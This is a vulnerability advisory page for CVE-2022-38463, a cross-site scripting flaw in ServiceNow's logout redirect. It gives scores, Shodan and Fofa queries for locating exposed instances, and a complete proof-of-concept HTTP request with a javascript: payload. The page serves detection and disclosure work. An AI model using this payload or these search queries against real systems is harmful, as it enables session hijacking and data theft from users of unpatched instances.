🔙 목록으로 돌아가기

CVE-2022-38463: ServiceNow - Cross-Site Scripting

TitleServiceNow - Cross-Site Scripting
Authoramanrawat
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, data theft, or defacement of the affected ServiceNow instance.
RemediationApply the latest security patches provided by ServiceNow to mitigate this vulnerability.
CVSS Score6.1
EPSS Score0.46526
CVE IDCVE-2022-38463
CWE IDCWE-79
Shodan Queryhttp.title:"ServiceNow"http.title:"servicenow"http.favicon.hash:1701804003
Fofa Querytitle="servicenow"icon_hash=1701804003
Tags cve cve2022 servicenow xss vuln

🔍 Vulnerability Description

ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript.

🌐 HTTP Request

GET /logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain) HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-38463.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-38463.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A